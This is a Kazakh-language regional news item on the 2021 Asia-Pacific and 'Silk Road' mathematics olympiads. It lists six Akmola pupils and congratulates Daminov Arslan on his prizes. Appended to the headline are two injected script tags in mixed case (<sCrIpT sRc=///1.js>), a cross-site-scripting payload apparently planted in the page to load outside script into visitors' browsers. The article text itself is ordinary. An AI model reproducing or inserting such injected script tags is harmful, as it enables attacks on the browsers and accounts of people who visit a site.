XXXІІІ Халықаралық қашықтық Азия-Тынық мұхиттық математикалық олимпиадасы мен «Жібек жолы» ХХ Халықаралық математикалық олимпиадасының қорытындысы туралы ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
12.03.2021
2021 жылдың 9-10 наурыз аралығында онлайн режимде XXXІІІ Халқаралық қашықтық Азия-Тынық мұхит математикалық олимпиадасы және "Жібек жолы" ХХ Халықаралық математикалық олимпиадасы өтті.
Аталған зияткерлік олимпиадаларды өткізудің негізгі идеясы-математика ғылымдары саласында дарынды оқушыларды анықтау, дамыту және қолдау үшін жағдай жасау, сондай-ақ қатысушы елдер арасындағы халықаралық білім беру және ғылыми байланыстарды дамыту.
Қазақстаннан 150 оқушы қатысты. Оның ішінде Ақмола облысының намысын қорғаған 6 оқушы. Олар:
- Хамитов Мират - Көкшетау қаласы, «Білім – инновация» лицей – интернатының 9 сынып оқушысы;
- Қабылбек Дидар – Нұр-Сұлтан қаласы, дарынды балаларға арналған №2 облыстық мамандырылған мектеп-интернатының 9 сынып оқушысы;
- Мукашев Алихан - Көкшетау қаласы, «Білім – инновация» лицей – интернатының 10 сынып оқушысы;
- Даулетбай Дидар - Көкшетау қаласы, «Білім – инновация» лицей – интернатының 10 сынып оқушысы;
- Алпысбай Әділхан - Көкшетау қаласы, «Білім – инновация» лицей – интернатының 11 сынып оқушысы;
- Даминов Арслан - Көкшетау қаласы, «Білім – инновация» лицей – интернатының 11 сынып оқушысы.
Конкурс қорытындысы нәтижесінде «Білім – инновация» лицей – интернатының 11 сынып оқушысы Даминов Арслан XXXІІІ Халықаралық қашықтық Азия-Тынық мұхит математикалық олимпиадасынан ІІІ орынға және "Жібек жолы" ХХ Халықаралық математикалық олимпиадасынан ІІ орынға ие болып, қола жүлдегері атанды. Даминов Арсланды шын жүректен құттықтаймыз! Әлі талай жетістіктеріңізбен қуанта беріңіздер!